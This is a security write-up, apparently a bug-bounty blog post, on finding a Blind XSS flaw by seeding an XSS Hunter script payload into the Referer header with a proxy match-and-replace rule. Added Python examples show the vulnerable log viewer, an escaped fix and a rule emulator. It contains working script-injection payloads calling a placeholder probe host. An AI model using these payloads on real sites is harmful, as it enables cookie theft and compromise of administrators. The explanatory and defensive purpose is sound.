newp_th

Summary

The author describes finding a Blind XSS vulnerability on redacted.com with XSS Hunter, detailing the steps and methodology used to seed the probe payload into requests and to confirm, hours later, that it executed.

Abstract

In a short write-up, the author recounts identifying a Blind XSS vulnerability on a private website, redacted.com. The article describes Blind XSS as a variant of XSS in which the malicious script is stored server-side (typically in logs or a database) and executes later, in a context the attacker cannot observe, such as an administrator's log viewer. The author used XSS Hunter, a platform for detecting XSS whose payload reports back when it fires, and injected the payload with an intercepting proxy rule: a request-header match-and-replace rule that matches the Referer header with a regular expression and replaces it with the XSS Hunter payload. Hours later, XSS Hunter reported that the payload had executed, confirming that the site renders logged request data without escaping it.

Opinions

  • The author views XSS Hunter as an effective tool for penetration testing, particularly for monitoring and organizing Blind XSS vulnerabilities.
  • The article suggests that Blind XSS is a significant security concern, as it can be stored on the server-side and executed at a later time, potentially affecting many users.
  • The author implies that a regular-expression match-and-replace on request headers is a convenient way to seed a Blind XSS payload into every request during testing.
  • The use of XSS Hunter for Blind XSS attacks is highlighted as a key feature of the platform, indicating the author's preference for this tool in such scenarios.
  • The author's success in finding the Blind XSS vulnerability reflects a proactive approach to security testing and an understanding of the importance of such tests in maintaining web application security.

How I found Blind XSS Vulnerability in redacted.com

Today I want to share a Blind XSS that I found in a private site. In this write-up I explain how I found it and the methodology I used.

Blind XSS is a flavour of cross-site scripting (XSS) in which the attacker "blindly" submits malicious payloads into inputs that the application is likely to persist (a database, a log file, a support ticket, a request header that gets logged) and later render somewhere the attacker cannot see, such as an internal admin panel or log viewer. Because nothing is reflected in the attacker's own response, the only way to know the payload fired is for the payload itself to call home.
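To make the sink concrete, here is an added example (not code from the original post) of the kind of server-side code that turns a logged Referer header into a Blind XSS: one handler writes the request log and returns nothing interesting to the sender, and an internal viewer renders the log, unescaped, for whoever opens it later. The headers, the in-memory store and the host `probe.example` are constructed placeholders; `probe.example` stands in for the tester's XSS Hunter payload host.

```python
"""Blind XSS sink: a request log that an internal viewer renders later.

Added example, not code from the original post. The request headers and
the host "probe.example" are constructed placeholders.
"""
import html
from typing import Dict, List, Tuple

# Constructed sample of an attacker's request. The payload rides in the
# Referer header, which many apps log but never render back to the sender.
ATTACKER_HEADERS: Dict[str, str] = {
    "Host": "redacted.example",
    "User-Agent": "Mozilla/5.0",
    "Referer": '"><script src="https://probe.example/x.js"></script>',
}


def log_request(store: List[Dict[str, str]], headers: Dict[str, str]) -> str:
    """Server side: record the request and answer the sender.

    The response never contains the stored headers, so the attacker sees
    nothing reflected. That is what makes the XSS "blind": the only
    evidence of execution will come from the payload calling home.
    """
    store.append({
        "referer": headers.get("Referer", "-"),
        "user_agent": headers.get("User-Agent", "-"),
    })
    return "200 OK"


def render_log_vulnerable(store: List[Dict[str, str]]) -> str:
    """Internal log viewer that concatenates logged values straight into HTML.

    This is the sink. Whoever opens the viewer (an admin, hours later)
    executes whatever was logged, in the viewer's origin and session.
    """
    rows = "".join(
        f"<tr><td>{e['referer']}</td><td>{e['user_agent']}</td></tr>"
        for e in store
    )
    return f"<table>{rows}</table>"


def render_log_hardened(store: List[Dict[str, str]]) -> str:
    """Same viewer with output encoding applied at the HTML sink.

    html.escape with quote=True turns < > & " ' into entities, so the
    logged payload is displayed as text instead of being parsed as markup.
    """
    rows = "".join(
        "<tr><td>{}</td><td>{}</td></tr>".format(
            html.escape(e["referer"], quote=True),
            html.escape(e["user_agent"], quote=True),
        )
        for e in store
    )
    return f"<table>{rows}</table>"


def demo() -> Tuple[str, str]:
    """Log one attacker request, then render it both ways."""
    store: List[Dict[str, str]] = []
    log_request(store, ATTACKER_HEADERS)
    return render_log_vulnerable(store), render_log_hardened(store)


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("vulnerable viewer:", vulnerable)
    print("hardened viewer:  ", hardened)
```

The fix belongs at the sink, not at the log: escaping on output (or a template engine with auto-escaping enabled for every template, including internal ones) stops the stored value from becoming markup, and a Content-Security-Policy on the internal viewer that does not allow the probe host in script-src would stop the probe from loading even where escaping is missed.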

Currently I use XSS Hunter (the web version) to find Blind XSS.

XSS Hunter:

XSS Hunter is a platform that makes penetration testing for XSS vulnerabilities much easier to monitor and organize. Through it you can launch all kinds of XSS attacks, but where it really shines is Blind XSS: you inject a short payload that loads a script from your XSS Hunter subdomain, and when that payload executes in a victim's browser, hours or days later, XSS Hunter records the URL of the page it fired on, the referrer, the user agent, any cookies readable from script, and a snapshot of the DOM, so you can tell where the stored input was rendered.

Step 1: The payload is seeded with a match-and-replace rule in the intercepting proxy (the fields below are those of Burp Suite's Proxy > Match and Replace dialog). None of the pre-defined rules does what we need, so click "Add" and the new rule dialogue appears. Click the "Type" drop-down and select "Request header".

Then enter ^Referer.*$ as the "Match" criteria. This is a regular expression that matches any header line that starts with Referer; since a request carries at most one Referer header, a simple anchored match is all we need. The ^ anchor matters: without it the rule would also fire on any other header whose name merely contains "Referer".

Next, set the "Replace" text to Referer: "> followed by the script payload from your XSS Hunter account (the post reproduces only the "> prefix, which closes a surrounding attribute and tag in case the logged value is rendered inside one). Then tick the "Regex match" checkbox and click "OK".

Step 2: Once the rule is active, the next intercepted request shows in its "Raw" view that the Referer header has been replaced with the payload (the original post shows this in a screenshot).

Step 3: A few hours later, when I went back to XSS Hunter, it showed that the blind XSS had executed.
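The three steps above amount to rewriting one header in every outgoing request. The following is an added example (not code from the original post and not part of any proxy tool) that emulates the rule on a raw HTTP request, so the behaviour of the ^Referer.*$ match can be checked before pointing it at a target. The request text is constructed, and `probe.example` stands in for the tester's XSS Hunter subdomain.

```python
"""Emulate a request-header match-and-replace rule on a raw HTTP request.

Added example, not code from the original post or from any proxy tool.
RAW_REQUEST is constructed and "probe.example" is a placeholder for the
tester's XSS Hunter payload host.
"""
import re
from typing import List, Tuple

MATCH = r"^Referer.*$"            # the rule's Match field, Regex match enabled
PAYLOAD_HOST = "probe.example"    # placeholder for your XSS Hunter subdomain
REPLACE = f'Referer: "><script src="https://{PAYLOAD_HOST}"></script>'

# Constructed request as the proxy sees it before the rule runs. The
# X-Referer-Note header is there to show why the ^ anchor matters.
RAW_REQUEST = (
    "GET /search?q=test HTTP/1.1\r\n"
    "Host: redacted.example\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: https://redacted.example/\r\n"
    "X-Referer-Note: not a real Referer header\r\n"
    "\r\n"
)


def apply_rule(raw: str, match: str = MATCH, replace: str = REPLACE) -> Tuple[str, int]:
    """Apply a header rule the way proxies do: to each header line on its own.

    Each header is matched as a separate string, so ^ and $ anchor to the
    start and end of that one header. Returns the rewritten request and
    the number of headers that were replaced.
    """
    head, sep, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    request_line, headers = lines[0], lines[1:]
    pattern = re.compile(match)
    rewritten: List[str] = []
    replaced = 0
    for header in headers:
        new_header, count = pattern.subn(replace, header)
        rewritten.append(new_header)
        replaced += count
    return "\r\n".join([request_line, *rewritten]) + sep + body, replaced


def header_value(raw: str, name: str) -> str:
    """Return the value of the first header called `name`, or '' if absent."""
    head = raw.partition("\r\n\r\n")[0]
    for line in head.split("\r\n")[1:]:
        key, _, value = line.partition(":")
        if key.strip().lower() == name.lower():
            return value.strip()
    return ""


if __name__ == "__main__":
    out, n = apply_rule(RAW_REQUEST)
    print(f"{n} header(s) replaced")
    print(out)
    # Dropping the ^ anchor makes the rule fire on X-Referer-Note as well,
    # corrupting a header the rule was never meant to touch.
    _, n_unanchored = apply_rule(RAW_REQUEST, match=r"Referer.*$")
    print(f"without ^ anchor: {n_unanchored} header(s) replaced")
```

Two practical caveats follow from the emulation. First, the rule only rewrites a Referer header that is already present; a request sent without one (the browser omits it under a strict Referrer-Policy, and most API clients never send it) carries no payload, so for those a rule that adds the header is needed rather than one that replaces it. Second, the rule applies to every request passing through the proxy, so scope it to the target host before enabling it, or the payload lands in the logs of every third-party site your browser touches.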

Tags: Security, Blind XSS, XSS Attack, Cross Site Scripting, Web Application Security